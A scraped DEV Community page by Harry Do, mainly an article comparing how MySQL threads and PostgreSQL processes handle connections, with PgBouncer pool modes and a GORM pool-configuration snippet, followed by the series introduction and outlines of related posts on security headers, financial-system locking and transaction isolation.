1. MySQL: The Thread-Based Approach

Reference: https://dev.mysql.com/blog-archive/the-new-mysql-thread-pool/

MySQL uses a single process with multiple threads to handle all connections. Think of it like one big house where everyone shares the same kitchen, living room, and resources. It's memory efficient because all threads live in the same space, which means you can handle thousands of connections without breaking the bank.
Here's how MySQL handles things:

The Flow: When clients (your app, CLI tools, or any API using the MySQL client-server protocol) send connection requests to MySQL, the system follows a sophisticated thread pooling mechanism:
- A Receiver Thread acts as the gatekeeper, queuing up incoming connections and managing the initial handshake process
- It processes them one by one, assigning each to a Thread Group in round-robin fashion to ensure balanced load distribution across available worker threads
- Query Worker Threads inside that Thread Group actually execute your queries, handling everything from parsing to execution
- Each connection gets its own THD (a thread context data structure that tracks connection state, session variables, transaction state, and query metadata)
One Big Process: There's a single main mysqld process running everything, which means all database operations, from query execution to buffer management, happen within this unified process space
Threads Everywhere: Each connection is just a thread in that process, making connection creation extremely lightweight since it doesn't require forking new processes or copying memory spaces
Shared Memory: All threads hang out in the same memory space and share resources like the buffer pool, query cache, and table metadata, enabling efficient resource utilization

The Good Stuff:

Memory Friendly: Threads share memory, so you can have thousands of connections without breaking the bank
Lightning Fast Connections: Creating a thread is super quick
Shared Cache Benefits: Everyone gets to use the same buffer pool and cache
Works on Tight Budgets: Perfect when you don't have tons of RAM
Handles the Crowd: Great for dealing with lots of concurrent connections

The Not-So-Good:

All Eggs in One Basket: If the main process goes down, everything dies
Not Much Separation: One bad connection can mess with the others
Shared Memory Risks: If memory gets corrupted, it affects everyone
Less Protection: Threads aren't as isolated as separate processes
Thread Contention: Under heavy load, thread synchronization overhead can impact performance

2. PostgreSQL: The Process-Based Approach

Reference: https://medium.com/@hnasr/postgresql-process-architecture-f21e16459907

PostgreSQL takes a completely different approach. PostgreSQL uses separate processes for each connection. Think of it like a neighborhood where each family has their own house with their own resources. Each connection is completely isolated from the others, which provides better stability and security, but it comes at the cost of higher memory usage since each process needs its own space.

The Flow: When a client connects to PostgreSQL, the system follows a fork-based process creation model:
- The Postmaster (main supervisor process) listens for incoming connections on the configured port (default 5432) and acts as the primary coordinator for all database activity
- When a request arrives, Postmaster authenticates it by validating credentials and checking access permissions before allowing the connection to proceed
- Once authenticated, it uses the Unix fork() system call to create a brand new Backend Process dedicated exclusively to that connection, complete with its own memory space and execution context
- This Backend Process handles all queries from that client until disconnect, maintaining session state, transaction context, and query execution buffers independently from all other connections
Memory Architecture: PostgreSQL's memory model is divided into two distinct areas to balance isolation with efficiency:
- Private Memory: Each Backend Process gets its own isolated memory space (~2-5MB base, can grow based on workload) for query execution, session state, temporary tables, sort operations, and connection-specific buffers, ensuring complete isolation from other connections
- Shared Memory: All processes share a common area for caching data pages (shared_buffers), Write-Ahead Log (WAL) buffers, lock tables, and coordination structures, allowing efficient data sharing while maintaining process isolation
Background Processes: PostgreSQL also runs essential helper processes like WAL Writer (for transaction logging), Checkpointer (for flushing dirty buffers), Autovacuum Workers (for cleaning up dead tuples), and Stats Collector (for gathering query statistics) to keep things running smoothly without impacting user connections

The Good Stuff:

Total Isolation: Each connection is its own thing, completely separate
More Stable: If one process crashes, the others keep chugging along
Protected Memory: Each process has its own memory sandbox
Extra Security: OS-level process isolation is pretty solid

The Not-So-Good:

Memory Hog: Each process uses ~2-5MB base memory per connection, which can grow based on workload complexity
Slower Startup: Forking a new process takes longer than spinning up a thread
Connection Limits: Can't handle as many connections at once
Memory Gets Messy: As processes grow, memory gets fragmented
Needs Connection Pooling: Pretty much required for production (more on this below)
IPC Overhead: Inter-process communication is slower than inter-thread communication

3. Connection Pooling: Why PostgreSQL Really Needs It

Here's the deal: Because of how PostgreSQL is built, you basically have to use connection pooling in production. MySQL can handle more direct connections than PostgreSQL thanks to its thread-based architecture, but connection pooling is still highly recommended for production environments to minimize connection overhead (authentication, handshake costs) and improve overall performance.

Why PostgreSQL Is Basically Begging for Connection Pooling:

Memory Gets Expensive: Each connection = 1 whole OS process using ~2-5MB base memory (can grow with workload)
Slow Connections: Forking processes is way slower than spinning up threads
You'll Hit a Wall: You're limited by how much memory you have and how many processes your system allows
Memory Gets Wasted: Over time, memory gets fragmented and inefficient

Two Ways to Pool: Proxy vs Application-Level

Let me break down the two main approaches:

Application-level pooling is baked right into your app's code. You use a library or framework feature that creates and manages a pool of connections when your app starts up. It's like having your own personal stash of database connections.

sqlDB, err := db.DB()
// SetMaxIdleConns sets the maximum number of connections in the idle connection pool.
sqlDB.SetMaxIdleConns(10)
// SetMaxOpenConns sets the maximum number of open connections to the database.
sqlDB.SetMaxOpenConns(100)
// SetConnMaxLifetime sets the maximum amount of time a connection may be reused.
sqlDB.SetConnMaxLifetime(time.Hour)

On the other hand, Proxy-level pooling is like having a middleman. You set up a separate service (like PgBouncer) that sits between your app and the database. Your app talks to the proxy, and the proxy manages a pool of real database connections. When you need to do something, the proxy hands you a connection that's already warmed up and ready to go.

Proxy Pool Modes:

Session Mode: Safest and most compatible option that supports all PostgreSQL features including prepared statements, cursors, advisory locks, and session-level settings - a client connection is mapped to a server connection for the entire session duration, just like connecting directly to PostgreSQL
Transaction Mode: Recommended for most web applications and REST APIs because it releases the server connection back to the pool after each transaction commits or rolls back, providing excellent connection reuse while supporting most common use cases (note: older PgBouncer versions don't support prepared statements in this mode, but PgBouncer 1.21.0+ added support via max_prepared_statements parameter; still doesn't support cursors or session-level features across transactions)
Statement Mode: Highest throughput and most aggressive pooling that returns connections to the pool after every single SQL statement, maximizing connection reuse but with significant restrictions - doesn't support multi-statement transactions, prepared statements, or any session state, making it suitable only for very specific simple read-only workloads

Comparison between two approaches

Factor	Proxy-Level (PgBouncer)	Application-Level (GORM)
Where It Lives	Between app and database	Inside your application
Who It Helps	All your applications	Just one application
How You Set It Up	One central config	Configure each app
Memory Cost	Barely touches your app	Uses your app's memory
Connection Control	Controls everything globally	Each app sets its own limits
When Things Break	Built-in failover	You handle it yourself
Watching Metrics	See everything in one place	Per-app metrics
How You Deploy It	Separate service to run	Just part of your app

The Smart Move: Use Both

Honestly? Do both for maximum efficiency and reliability:

Use PgBouncer to manage connections globally across all your services, providing a centralized connection pool that prevents any single application from overwhelming the database and allows you to monitor and control all database access from one place
Use GORM (or whatever your framework offers) for app-specific tuning, allowing each application to optimize its connection behavior based on its specific workload patterns, request rate, and performance requirements without affecting other services
This layered approach gives you redundancy and flexibility—best of both worlds—where PgBouncer provides the critical last line of defense against connection exhaustion while application-level pools optimize for each service's unique needs and can fail gracefully if PgBouncer encounters issues

4. Key Takeaways: Side-by-Side Comparison

Factor	MySQL (Thread-Based)	PostgreSQL (Process-Based)
Memory per Connection	Very low (threads share memory)	High (each process needs own memory)
Max Connections	Very high with thread pool	Limited without pooling
Connection Speed	Fast (thread creation)	Slower (process forking)
Connection Pooling	Recommended (handles direct connections better)	Required in production
Crash Impact	Entire server goes down	Only affected connection fails
Process Isolation	Shared memory (lower isolation)	OS-level (strong isolation)
Best For	High connection count, simple queries, serverless	Complex queries, write-heavy, advanced features
Infrastructure	Simple, works out-of-the-box	Needs PgBouncer/PgPool setup

Bottom Line: MySQL's thread model is more forgiving and handles high connection counts easily. PostgreSQL's process model provides better isolation but requires connection pooling in production. Both are excellent databases—choose based on your connection patterns and operational requirements.

MySQL vs PostgreSQL: Understanding the differences

Harry Do — Tue, 14 Oct 2025 09:47:24 +0000

My Story

I spent most of my career working with PostgreSQL. Then I joined a new company that uses MySQL, and I realized a lot of things in MySQL work... differently.

At first, I assumed these were just surface-level differences - different syntax, different commands. But as I dug deeper, I discovered something more interesting: these databases make fundamentally different architectural choices. How they handle connections, organize data on disk, manage concurrent updates, enforce data integrity — there are deliberate trade-offs at each level.

Understanding these differences transformed how I work with both databases. It helped me avoid performance pitfalls, write better queries, and make more informed architectural decisions. More importantly, it helped me understand that the question isn't "which database is better?" — it's "which trade-offs matter for my use case?"

That's why I'm writing this series to share what I learned and help you understand how these databases really work under the hood.

What We're Comparing

We'll be comparing:

MySQL (InnoDB storage engine): Version 8.4.x
PostgreSQL: Version 17.x

Why InnoDB specifically? Because it's the default and most widely-used storage engine in MySQL. When people talk about MySQL in production, they're almost always talking about InnoDB.

Note: Both MySQL and PostgreSQL are world-class databases powering some of the largest applications on the internet. This isn't about declaring a winner—it's about understanding the architectural trade-offs each database makes. Sometimes MySQL's choices are better for your use case, sometimes PostgreSQL's are. The goal is to give you the knowledge to make that decision yourself.

Let's dive in.

DEV Community: Harry Do

HTTP Security Headers

I. What Are HTTP Security Headers?

II. Why Security Headers Matter

Test Your Site's Security Headers

III. Understanding Security Header Categories

The Essential Headers (You Should Have These)

The Recommended Headers (Most Sites Use These)

The Advanced Headers (Complex But Powerful)

The Legacy Headers (Avoid These)

IV. Deep Dive: Configuring Each Header

1. Strict-Transport-Security (HSTS)

2. X-Content-Type-Options

3. Referrer-Policy

4. X-Frame-Options

Security Risk Scenario

How It Solves It

Detailed Information

5. Permissions-Policy

Security Risk Scenario

How It Solves It

Detailed Information

Common Issues

6. Content-Security-Policy (CSP)

Security Risk Scenario

How CSP Solves It

Detailed Information

Common Issues

7. CSP Report Only

Violation Report Format

8. X-XSS-Protection

Security Risk Scenario

How It Solves It

Detailed Information

Common Issues

V. Some Common Pitfalls

VI. Best Practices

How We Handle Concurrency Control in Financial Systems

The Problem: When Data Integrity Breaks Down

Why Financial Systems Are Different

Our Mission: Protecting Financial Data Integrity

Three War Stories: When Concurrency Goes Wrong

Story #1: The Race Condition

Story #2: The Moving Target

Story #3: The Time Traveler's Mistake

The Solution: Two Locks for Two Problems

Solution #1: Pessimistic Locking (For Concurrent Operations)

The Challenge

Two Ways to Lock: Database vs Redis

Option 1: Redis Distributed Locks

Option 2: Database Row Locks (SELECT FOR UPDATE)

Why We Chose Redis

Solution #2: Optimistic Locking (For Version Conflicts)

The Problem with Stale Data

How We Detect Version Changes

Strategy 1: ID-Based Versioning (For Audit Tables)

Strategy 2: Timestamp-Based Versioning (For Regular Tables)

How Both Locks Work Together

Implementation Details: How We Built It

Choosing the Right Redis Library

How the Lock System Works

How Locks Work in Practice

Two Ways to Release Locks

Pattern 1: Auto-Release (For Quick Operations)

Pattern 2: Manual Release (For Background Jobs)

Lessons Learned: Building Concurrency Control for Financial Systems

When to Use Which Lock

What We Got Right

The Trade-offs We Made

Final Thoughts

Part 4: MySQL vs PostgreSQL - Transaction Processing and ACID Compliance

Table of Contents

1. Overview: Key Architectural Differences

Core Architecture Comparison

What Each Difference Means

2. Isolation Levels and Concurrency Control

2.1 Isolation Levels Comparison

2.2 Write-Skew Anomaly

The Doctor On-Call Scheduling Problem

2.3 Gap Locking vs Predicate Locks